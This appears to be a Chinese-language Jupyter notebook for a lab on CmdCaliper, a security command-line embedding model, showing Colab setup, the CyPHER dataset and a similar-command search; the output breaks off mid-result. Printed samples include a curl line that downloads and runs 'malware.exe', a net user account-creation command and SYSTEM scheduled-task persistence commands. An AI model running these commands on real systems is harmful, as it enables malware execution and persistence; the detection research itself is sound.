# CmdCaliper Lab 練習
## 注意事項
1. 請先註冊 Huggingface 帳號至 [CyCraftAI/CmdCaliper-small](https://huggingface.co/CyCraftAI/CmdCaliper-small) 填寫分享使用資料同意書
2. 環境使用 Colab 進行，務必先擁有一個 Google 帳號並開啟 [Colab](https://colab.google/)
3. 如果有使用到 CmdCaliper 的 [synthesize_cmds.py](synthesize_cmds.py) 或 [synthesize_positive_cmds.py](synthesize_positve_cmds.py) 時，會需要 OpenAI 的 API_KEY，這可能會產生費用
4. 關於 OpenAI 的更多資訊請參閱 [OpenAI Platform](https://platform.openai.com/docs/overview)
## Lab 說明
此次練習包含 Lab0、Lab1、Lab2 三項，詳細說明請參閱下方題目說明處。
1. 熟悉 Colab 及試用 CmdCaliper
2. 根據敘述找到最接近的 cmdline
3. 根據給定的 cmdline，推論出三個可能的下一步指令

---

## Lab 0 - 熟悉 Colab 及試用 CmdCaliper

In [14]:
print("Hello world")

Hello world


### Bash 操作
Google Colab 最強大的功能是能夠免費使用雲端 GPU。您可以通過在指令前添加 ! 來執行大多數的 Bash 指令。
* 從 Runtime -> Change Runtime Type -> Hardware Acceleration 開啟 GPU。
* 整個 Colab 在雲端虛擬機器 (VM) 中運行。
* 目前的 Colab 筆記本是運行在 Ubuntu 上。

In [15]:
!ls -l
!pwd

total 152
-rw-rw-r-- 1 is1ab is1ab   438 十二  6 10:30 credential_config_template.yaml
-rw-rw-r-- 1 is1ab is1ab   289 十二  6 10:52 credential_config.yaml
drwxrwxr-x 2 is1ab is1ab  4096 十二  6 13:58 dataset
-rw-rw-r-- 1 is1ab is1ab  3732 十二  6 10:30 evaluate.py
-rw-rw-r-- 1 is1ab is1ab  2486 十二 12 13:51 lab1_cmd_retrieval.py
-rw-rw-r-- 1 is1ab is1ab  2926 十二  6 15:45 lab1_desc_to_cmd.py
-rw-rw-r-- 1 is1ab is1ab 85610 十二 12 14:20 lab.ipynb
drwxrwxrwx 2 is1ab is1ab  4096 十二  6 11:07 output
-rw-rw-r-- 1 is1ab is1ab  5777 十二  6 10:30 README.md
-rw-rw-r-- 1 is1ab is1ab   150 十二  6 10:55 requirements.txt
drwxrwxr-x 3 is1ab is1ab  4096 十二  6 10:51 src
-rw-rw-r-- 1 is1ab is1ab  2926 十二  6 11:29 synthesize_cmds.py
-rw-rw-r-- 1 is1ab is1ab  3223 十二  6 10:30 synthesize_positive_cmds.py
-rw-rw-r-- 1 is1ab is1ab  6470 十二  6 14:04 test.ipynb
-rw-rw-r-- 1 is1ab is1ab  4597 十二  6 15:45 test.py


huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...
To disable this warning, you can either:
	- Avoid using `tokenizers` before the fork if possible
	- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)


/home/is1ab/code2/CmdCaliper


huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...
To disable this warning, you can either:
	- Avoid using `tokenizers` before the fork if possible
	- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)


In [16]:
!cat /etc/*release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04 LTS"
NAME="Ubuntu"
VERSION="20.04 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focal


huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...
To disable this warning, you can either:
	- Avoid using `tokenizers` before the fork if possible
	- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)


### GPU 資訊

GPU 的詳細資訊可使用 `!nvidia-smi` 指令。
如果沒有顯示畫面，可能是您沒有切換到 GPU 的環境喔! (此次 Lab 原則上不會使用 GPU，但這次 Colab 最吸引人的地方，有免費顯卡提供訓練)。

In [18]:
!nvidia-smi

Thu Dec 12 14:24:57 2024       
+---------------------------------------------------------------------------------------+
| NVIDIA-SMI 535.183.01             Driver Version: 535.183.01   CUDA Version: 12.2     |
|-----------------------------------------+----------------------+----------------------+
| GPU  Name                 Persistence-M | Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp   Perf          Pwr:Usage/Cap |         Memory-Usage | GPU-Util  Compute M. |
|                                         |                      |               MIG M. |
|=========================================+======================+======================|
|   0  NVIDIA RTX A5000               Off | 00000000:01:00.0 Off |                  Off |
| 30%   33C    P8              15W / 230W |   1426MiB / 24564MiB |      0%      Default |
|                                         |                      |                  N/A |
+-----------------------------------------+----------------------+--

huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...
To disable this warning, you can either:
	- Avoid using `tokenizers` before the fork if possible
	- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)


In [19]:
from platform import python_version
import torch
print("Python version", python_version())
print("Pytorch - version", torch.__version__)
print("Pytorch - cuDNN version :", torch.backends.cudnn.version())

Python version 3.10.15
Pytorch - version 2.5.1+cu124
Pytorch - cuDNN version : 90100


### 資料上傳 (非常重要)
在 Google Colab 中，有以下幾種方式可以將資料上傳到虛擬機：

1. **從本機上傳 (From Machine)**
- 使用 Colab 左側內建的檔案管理面板。
- 點擊左側的檔案標籤，然後選擇 **上傳 (Upload)**，直接將本機的檔案拖放或選擇要上傳的檔案。

2. **從 Google Drive 上傳 (From Google Drive)**
- 在 Colab 左側內建的檔案管理面板中，點擊 **Mount Drive (掛載雲端硬碟)**。
- 掛載完成後，您的 Google Drive 會顯示在檔案樹中，您可以直接存取或載入檔案。

1. **使用 `wget` 指令**
- 如果資料存放在公開的網路上，您可以使用 `wget` 指令下載。
- 指令範例：
  ```bash
  !wget http://example.com/yourfile.zip


In [ ]:
from google.colab import drive
drive.mount('/content/drive')

In [20]:
!pwd

/home/is1ab/code2/CmdCaliper


huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...
To disable this warning, you can either:
	- Avoid using `tokenizers` before the fork if possible
	- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)


In [22]:
!wget https://dl.fbaipublicfiles.com/XLM/codes_xnli_100

--2024-12-12 14:31:50--  https://dl.fbaipublicfiles.com/XLM/codes_xnli_100
Resolving dl.fbaipublicfiles.com (dl.fbaipublicfiles.com)... 13.35.7.50, 13.35.7.38, 13.35.7.128, ...
Connecting to dl.fbaipublicfiles.com (dl.fbaipublicfiles.com)|13.35.7.50|:443... connected.
HTTP request sent, awaiting response... 

huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...
To disable this warning, you can either:
	- Avoid using `tokenizers` before the fork if possible
	- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)


200 OK
Length: 2973279 (2.8M) [text/plain]
Saving to: ‘codes_xnli_100’

codes_xnli_100      100%[===================>]   2.83M  4.97MB/s    in 0.6s    

2024-12-12 14:31:51 (4.97 MB/s) - ‘codes_xnli_100’ saved [2973279/2973279]



In [23]:
!head -n 10 codes_xnli_100

a n 58300410
e r 55874871
e n 48332651
i n 46367809
a r 42047014
s t 41963553
a l 34495577
e n</w> 33743928
o n 30604783
o r 30086868


huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...
To disable this warning, you can either:
	- Avoid using `tokenizers` before the fork if possible
	- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)


In [24]:
!git clone https://github.com/ntunlp/MH6812-SPMS-2019

Cloning into 'MH6812-SPMS-2019'...


huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...
To disable this warning, you can either:
	- Avoid using `tokenizers` before the fork if possible
	- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)


remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 3 (delta 0), pack-reused 0 (from 0)
Unpacking objects: 100% (3/3), 228 bytes | 228.00 KiB/s, done.


In [25]:
!ls -l CE-7455-SPMS-2019

ls: cannot access 'CE-7455-SPMS-2019': No such file or directory


huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...
To disable this warning, you can either:
	- Avoid using `tokenizers` before the fork if possible
	- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)


其他 Python 的操作請參閱 [Python CheetSheet](PythonCheatSheet_tw.ipynb)

### CmdCaliper

預設使用模型 [CyCraftAI/CmdCaliper](https://huggingface.co/CyCraftAI/CmdCaliper-small)，記得要先填寫相關同意書才能使用喔!


CmdCaliper 主要的兩隻程式 [synthesize_cmds.py](synthesize_cmds.py) 與 [synthesize_positive_cmds.py](synthesize_positive_cmds.py) 都至少需要一個 Inference Engine (例如 GPT)，這些模型的 API Key 可能需要付費才能使用，如果您沒有金鑰，這一部分可以不執行，直接看預覽結果～！

API Key 的取得請參考投影片或是對應模型的官網說明。

如果您有金鑰，請按照以下步驟。

1. ``%cp credential_config_template.yaml credential_config.yaml``
2. 編輯 [credential_config.yaml](credential_config.uaml) 填上您的金鑰


In [ ]:
%cp credential_config_template.yaml credential_config.yaml

In [ ]:
!pip3 install -r requirements.txt

In [5]:
from datasets import load_dataset 

ds = load_dataset("CyCraftAI/CyPHER") #取得資料集
ds

DatasetDict({
    train: Dataset({
        features: ['query_cmd', 'negative_index_list', 'positive_cmd', 'idx'],
        num_rows: 28520
    })
    test: Dataset({
        features: ['query_cmd', 'negative_index_list', 'positive_cmd', 'idx'],
        num_rows: 2807
    })
})

In [6]:
import pandas as pd
import json
import random

query_cmd_list = ds['train']['query_cmd']
random_query_cmd_list = random.sample(query_cmd_list, 10) # 隨機抽取 10 筆資料

query_cmd_json = json.dumps(random_query_cmd_list, indent=4)
print(query_cmd_json)

[
    "powershell \"Get-NetConnectionProfile | Where { $_.NetworkCategory -eq 'Internet' } | Select-Object -ExpandProperty IPv4Address\"",
    "net user jsmith P@ssw0rd! /add",
    "taskkill /im sppsvc.exe /f",
    "assoc .jpg=jpegsnp.dll",
    "ping -n 30 -t 192.168.1.200",
    "\" wmic product where (not Version like '%Service Pack 2%') delete\"",
    "\"Get-WmiObject -Class Win32_OperatingSystem | ForEach-Object {{ $_.CSDVersion }} & echo. & pause\"",
    "\"C:\\Program Files\\Git\\bin\\bash.exe\" --login -c \"curl -o malware.exe http://192.168.1.100/malware.exe && chmod +x malware.exe && ./malware.exe\"",
    "taskkill /IM firefox.exe /F",
    "\"powershell -Command \"Get-Service -ComputerName some-computer | Where {$_.Status -eq 'Stopped'} | foreach {Restart-Service $_.Name}\"\""
]


In [27]:
!python3 cmd_retrieval.py --query-cmd 'schtasks /create /tn "SystemUpdate" /tr "C:\Windows\System32\cmd.exe /c C:\temp\malware.exe" /sc once /st 00:00 /ru SYSTEM' --model=CyCraftAI/CmdCaliper-small

huggingface/tokenizers: The current process just got forked, after parallelism has already been used. Disabling parallelism to avoid deadlocks...
To disable this warning, you can either:
	- Avoid using `tokenizers` before the fork if possible
	- Explicitly set the environment variable TOKENIZERS_PARALLELISM=(true | false)


Loading model: CyCraftAI/CmdCaliper-small
Querying for similar commands to: schtasks /create /tn "SystemUpdate" /tr "C:\Windows\System32\cmd.exe /c C:\temp\malware.exe" /sc once /st 00:00 /ru SYSTEM
Top similar commands:
Command: SCHTASKS  /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10 , Similarity Score: 0.6283
Command: "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "Atomic task" /TR "C:\windows\system32\cmd.exe" /SC daily /ST 20:10" , Similarity Score: 0.6157
Command: "C:\Windows\System32\cmd.exe" /c SCHTASKS /create /tn SERVRService /sc HOURLY /mo 1 /tr "C:\Windows\lsarpc.exe"  /ru "NT AUTHORITY\SYSTEM"&&SCHTASKS /run /tn SERVRService, Similarity Score: 0.6152
Command: "C:\Windows\system32\cmd.exe" /c "SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10" , Similarity Score: 0.5913
Command: cmd  /c SCHTASKS /create /tn SERVRSer